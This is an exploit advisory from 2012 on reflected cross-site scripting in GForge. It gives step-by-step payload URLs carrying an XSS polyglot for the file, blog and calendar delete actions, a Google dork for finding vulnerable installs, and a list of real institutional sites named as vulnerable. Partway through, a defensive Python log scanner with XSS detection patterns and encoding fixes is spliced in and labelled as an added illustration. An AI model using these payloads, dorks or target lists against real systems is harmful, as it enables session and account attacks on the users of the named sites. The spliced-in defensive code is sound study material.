Gforge.org suffers from multiple cross site scripting vulnerabilities.
# Exploit Title: GForge Cross Site Scripting
# Date: 30.01.2012
# Author: Sony
# Software Link: http://gforge.org
# Google Dorks: inurl:gf/user/ site:edu (gov,com,org,etc..) or other dorks (it's simple)
# Web Browser : Mozilla Firefox
# Blog : http://st2tea.blogspot.com
# PoC:
http://st2tea.blogspot.com/2012/01/gforge-cross-site-scripting.html
..................................................................
Well, we have an interesting XSS in GForge.
But we can test it on our own accounts. We can make 2 accounts for the test.
XSS found in the files, calendar, message wall (search users), blogs..
Files.
Upload our file.
http://gforge.org/gf/user/eleo/userfiles/
Then press the delete button, open the link in a new window and add our XSS to the URL.
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089[our xss is here]
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://1.bp.blogspot.com/-ob_5W9q6IOE/TybK50KNkHI/AAAAAAAAAU4/zcX5uwx-FDs/s1600/1234.JPG
Test this on your own account name.
Well, now..blog.
Create a post, press the delete button, open the link in a new window and add our XSS to the URL.
gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2[xss is here]
http://gforge.org/gf/user/eleo/userblog/my/admin/?action=UserblogDelete&id=2%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://1.bp.blogspot.com/-blGd0pC1uac/TybNH5m1LRI/AAAAAAAAAVE/X1_7uZTxpJ8/s1600/123454.JPG
or..
http://3.bp.blogspot.com/-QIqH6m6an2E/TybNMwaLUxI/AAAAAAAAAVQ/o439BgL8W2w/s1600/1234556.JPG
Calendar..
Open the calendar, press the "add new event" button, then press the delete button, open the link in a new window and add our XSS to the URL.
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600[our xss is here]
http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//\%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//\%22;alert%28String.fromCharCode%2888,83,83%29%29//--%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E
http://4.bp.blogspot.com/-l2PehXdxhPY/TybOC9eI8bI/AAAAAAAAAVc/dQfmhxCLy1o/s1600/calendar.JPG
And we have XSS in gf/my/messagewall/ (search users)
http://2.bp.blogspot.com/-7snLqFJ--f0/TybPLb9Un-I/AAAAAAAAAVo/f-z-jsdO1ns/s1600/search_user.JPG
http://3.bp.blogspot.com/-zNZi2myMDLc/TybPOlJUqfI/AAAAAAAAAV0/MTFCewGtziU/s1600/search_users2.JPG
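As an added, defender-side illustration (not part of this advisory and not GForge's own code), the following Python script shows how the reflected parameters listed above (file_id, id, event_id, start_date) can be picked out of web-server access logs when they carry script markup, and the input validation and context-aware output encoding that stop the reflection. The log lines are constructed for the example; the query strings follow the URLs quoted above, and the rule that every one of those parameters must be an integer is an assumption drawn from the values shown.

```python
"""Flag reflected-XSS probes in GForge-style delete URLs and show the fix.

Added example (not from the advisory or the GForge project). The access-log
lines below are constructed; the query strings mirror the advisory's URLs.
"""
import html
import json
import re
from urllib.parse import unquote, unquote_plus, urlsplit

# Parameters the advisory shows being reflected. Assumption: each must be an
# integer (the advisory only ever shows numeric values for them).
INT_PARAMS = {"file_id", "id", "event_id", "start_date"}

# Markers that mean a supposedly numeric parameter is carrying script text.
XSS_MARKERS = re.compile(
    r"<\s*/?\s*script|alert\s*\(|String\.fromCharCode|['\"]\s*;", re.IGNORECASE
)

# Constructed Apache/nginx combined-format lines: two benign, two probes.
SAMPLE_LOG = """\
203.0.113.5 - - [30/Jan/2012:10:00:01 +0000] "GET /gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089 HTTP/1.1" 200 512
203.0.113.5 - - [30/Jan/2012:10:00:09 +0000] "GET /gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//%3C/SCRIPT%3E HTTP/1.1" 200 640
198.51.100.7 - - [30/Jan/2012:10:01:00 +0000] "GET /gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600 HTTP/1.1" 302 0
198.51.100.7 - - [30/Jan/2012:10:01:05 +0000] "GET /gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%22%3E%3CSCRIPT%3Ealert%281%29%3C/SCRIPT%3E HTTP/1.1" 200 700
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)


def parse_query(query):
    """Split a query string on '&' only and percent-decode each part.

    Done by hand rather than with parse_qs so that the ';' inside the
    payload ('...%27;alert...') is never treated as a pair separator.
    """
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, raw = pair.partition("=")
        params.setdefault(unquote(name), []).append(unquote_plus(raw))
    return params


def is_int(value):
    return re.fullmatch(r"-?\d+", value) is not None


def scan_log(text):
    """Return (client_ip, param, decoded_value) for each integer-only parameter
    that is not an integer and contains script markers."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        query = urlsplit(m["target"]).query
        for name, values in parse_query(query).items():
            if name not in INT_PARAMS:
                continue
            for value in values:
                if not is_int(value) and XSS_MARKERS.search(value):
                    findings.append((m["ip"], name, value))
    return findings


# --- The fix: validate on input, encode for the output context. ---

def validate_id(raw):
    """Accept only a plain integer for an id parameter; reject anything else."""
    if not is_int(raw):
        raise ValueError("id parameter must be an integer")
    return int(raw)


def html_text(value):
    """Encode a value for insertion into HTML text or a quoted attribute."""
    return html.escape(value, quote=True)


def js_string_literal(value):
    """Encode a value as a JS string literal safe inside an inline <script>.

    json.dumps handles quotes and backslashes; '<', '>' and '&' are also
    escaped so '</script>' in the value cannot close the script element.
    """
    return (json.dumps(value)
            .replace("<", "\\u003c").replace(">", "\\u003e").replace("&", "\\u0026"))


if __name__ == "__main__":
    for ip, name, value in scan_log(SAMPLE_LOG):
        print(f"{ip}: non-numeric {name}={value!r}")
    print("escaped:", js_string_literal("3089';alert(1)//</SCRIPT>"))
```

Running the script prints the two probe lines and the neutralised JS literal. The important design point is that validation happens before the value is used anywhere: an id that is not an integer never reaches the confirmation page, so there is nothing left to reflect, and the encoders only matter for values that genuinely have to be echoed back.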
Also we can see in Google that a lot of sites run GForge and are vulnerable to XSS.
Joomlacode.org
http://2.bp.blogspot.com/-BbfJ7fJ20EI/TybQT5U2fYI/AAAAAAAAAWA/RYMoX_VQZUk/s1600/123.JPG
Stanford.edu
http://3.bp.blogspot.com/-neXykFEhP18/TybQeg0kScI/AAAAAAAAAWM/Wfpn7wAc0OQ/s1600/stan.JPG
http://2.bp.blogspot.com/-7Zwn9dCa_Ms/TybQjpYnq6I/AAAAAAAAAWY/1ZxT_pDJXzE/s1600/stan2.JPG
https://code.ros.org/gf/account/?action=UserAdd
https://forge.si.umich.edu/gf/account/?action=UserAdd
http://media.lbl.gov/gf/account/?action=UserAdd
etc..
It's not a critical vulnerability, but it's possible to use it to change the URL for different users.